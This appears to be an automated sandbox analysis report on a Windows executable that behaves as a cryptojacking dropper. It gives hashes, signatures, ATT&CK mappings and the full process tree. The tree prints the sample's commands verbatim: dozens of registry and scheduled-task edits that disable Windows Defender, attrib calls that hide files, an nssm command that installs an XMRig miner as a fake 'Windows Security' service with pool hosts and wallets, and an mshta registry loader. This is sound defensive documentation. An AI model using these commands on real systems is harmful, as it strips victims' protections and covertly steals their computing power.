Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
10/01/2024, 00:35
General
-
Target
4f1c5c4fe87d7e64466afd1850aeb0c2.exe
-
Size
4.1MB
-
MD5
4f1c5c4fe87d7e64466afd1850aeb0c2
-
SHA1
9256f3a6c36a7dc265555795d6a4f28e97b1aeb3
-
SHA256
44873eb5eb2117feff648571cce3503b21522beadafc2c7b64d8af9caca5a8dc
-
SHA512
2356aa91ea1e372de57fec2f3f28902c2c5bddabdb638ffd1bc582eba9cd2f683a7724691de4b2fb55dbfa0cdda66bea1bba981f7984fc3667476055d88155b4
-
SSDEEP
98304:3ftEAoiH6sp7l5qZiTs0nrwbB9oaNLcGlk+hHOfMVzdQqII:3JqCsxbB9oMLcB+hTxdj
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4f1c5c4fe87d7e64466afd1850aeb0c2.exe"C:\Users\Admin\AppData\Local\Temp\4f1c5c4fe87d7e64466afd1850aeb0c2.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\39AD.tmp\39AE.tmp\39AF.bat C:\Users\Admin\AppData\Local\Temp\4f1c5c4fe87d7e64466afd1850aeb0c2.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f1⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f1⤵
-
C:\Perform\7za.exe7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f1⤵
-
C:\Perform\update.exeC:\Perform\update.exe1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Perform\Resources\NSudo.exeC:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.72⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform1⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\Defender.exe1⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Perform\nssm.exenssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint 75 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o dero.miner.rocks:30182 -u dERirD3WyQi4udWH7478H66Ryqn3syEU8bywCQEu3k5ULohQRcz4uoXP12NjmN4STmEDbpHZWqa7bPRiHNFPFgTBPmcBVF8bcpM7SadhiW7jv -p w=KONG -a astrobwt -k -o stratum+tcp://pool.dero.fairhash.org:1333 -u dERirD3WyQi4udWH7478H66Ryqn3syEU8bywCQEu3k5ULohQRcz4uoXP12NjmN4STmEDbpHZWqa7bPRiHNFPFgTBPmcBVF8bcpM7SadhiW7jv -p w=KONG -a astrobwt -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff69f69758,0x7fff69f69768,0x7fff69f697782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=1664 --field-trial-handle=1452,i,15997766970121427203,6494575972080037421,131072 --disable-features=PaintHolding /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2000 --field-trial-handle=1452,i,15997766970121427203,6494575972080037421,131072 --disable-features=PaintHolding /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1272 --field-trial-handle=1452,i,15997766970121427203,6494575972080037421,131072 --disable-features=PaintHolding /prefetch:22⤵
-
-
C:\Perform\nssm.exenssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START1⤵
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\7za.exe1⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")1⤵
- Checks computer location settings
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\nssm.exe1⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"1⤵
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f1⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f1⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable1⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable1⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable1⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f1⤵
- Executes dropped EXE
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f1⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f1⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f1⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f1⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD572299377edffa335f2e34297080e79c4
SHA1feeeddafdb688eeed5c8a91fa501816058d27db8
SHA256303a4c5947d5a1155ec90da372380c42c01cd7bb6bd9c8521d718ce806b0efee
SHA5124dfd24b9b401494f5223c00f00a06e04f8f49259cd7838b0aa6cd3f20d295ebfe54a300fc0f73694ef5e3231712e2bbf2205b037a581a1f20c3e204f1ad5b21e
-
Filesize
68KB
MD5a2b3ba4e86503df27752076407272666
SHA1e5b55d6920a67356ae0f9f7a517554d40bd057a1
SHA256f0962a096fbbae3d578363d6eb6bb6d6312bb817a7fc7ca2f02d03bc68d0e620
SHA5121a5071c583455094eff7c7caad22467bc7425f3c17d2df3680caf22364c60ddb8db580d3f07177c3f5e7f7b1afb825b65db4de4a73bdd1ee9116e277dff931c7
-
Filesize
5KB
MD5f631afcf9aacc5b26fab50b1725f86d4
SHA146930502bf27f4d8f9023ce666513a65b352f42a
SHA2568b6470794f50830ac03e2dc707e6bb1372e91473e2b9c6272f165744810c6551
SHA512ea04a2ff09dae2931107d2f76bb2551c8fc1325a7a4150c7667947e558ffded04b3def3d6ab67e697ac20a1b631eebfb6464deacdb98205f2b6a709f65c70b28
-
Filesize
60KB
MD54e45dffd1119ee898cca48f5975673d8
SHA1787a0bbb84050f8d5fdad899fec82ffe385819f0
SHA256bfd0cf3379ff50a2a07450477320cd72c4db677a29fdd20edea442abdb8f8e8b
SHA512e04b4cc2ec3432b0b89499c40395b359606c4444e5d9609d5475ef6619407eef3323fa5419a1a62c45ae602df65965243de4d39b9c6c83bf038f328b37119885
-
Filesize
7KB
MD5f95c2ee06c94f827413abaeaa1edba04
SHA112d478dae3441af206da0503bec8dcf1fc478d40
SHA256c95df7122f859b1567397881dc3ab705bc1c883f447fedb4a0a236035cdaf7d0
SHA51217995e9f8b95e837e917c32275d2426b2e736c25a708cea6625cf999c14a368b56892534fca46f33735f0b0c71cbbf9c7d3b21cf1850ce57df8a9e160b051192
-
Filesize
745B
MD59fc9cd6fff29c03e2b164cafe21543a1
SHA1c348cd40f9e112413a2587ef3036628a056aee13
SHA256b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1
SHA5121362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b
-
Filesize
62KB
MD50b429ee753b10c474bf96fa81cb0943a
SHA131591108ef737513c6878cc219e219cd3b5bb11e
SHA2568746a54c66a524d7f0ac609d042adf43bff12adef6c57835fca125105a241fd4
SHA512e77381706066333457bd5bbee2743862e55acbc4880cc86deccc09af1691bd4691964080d4e09474f9d6e7a022bceac4b39b28fde69d46f6eb7b33ca60e32d0e
-
Filesize
20KB
MD59805b27f6b5304596d6c0eb9647cc9dd
SHA1adc4985ae0213f11d2c5cb376fda947173cb76bb
SHA256a1a912bbe9c8c8efda2916e7621164af1562e58c39a78db438255ced6f5d5e7f
SHA512e7c0a32f8aca8d58fa5e4ea69fe7be62f40bf60e7cda1b42f8597253b9dab81b0f281c284c55ac662d913e1961351485daa47aa6c50f46aecc2a69da170d598c
-
Filesize
6KB
MD532633a2e113017c20d7ecaa14e9b7504
SHA128bf1d903147fc15260581c9e1f53b5705da9086
SHA2569fe1793d27efc5a236d985b303c7e4e8c210f1fb1148e1e7278d6feb62eed98f
SHA5123e9ec57887b05063974845800d5d15a3ce7c3ed73c274920763627985ea152403b0a8d0626813446418bf7203b1e86f9c37254d72aaddee397d5d28ba2e5df5e
-
Filesize
82KB
MD51cd181f2c4f40258dccca79792ac3416
SHA1ea80f20f5bca1ce3a6e5af71a24349c492762426
SHA25654a5dbea5453962d9c8296d32dfd05ef20ac25196294d45cb3e30621af57f2b0
SHA5124027ca914335daf9bbb8cc8ca05c8391478ac3cbdba0dfa5761a7e50b985040e9d59f1caddacb4dbd61cf7405b8b345ceb470ecc9ce0762f514aa6cf8ec449f6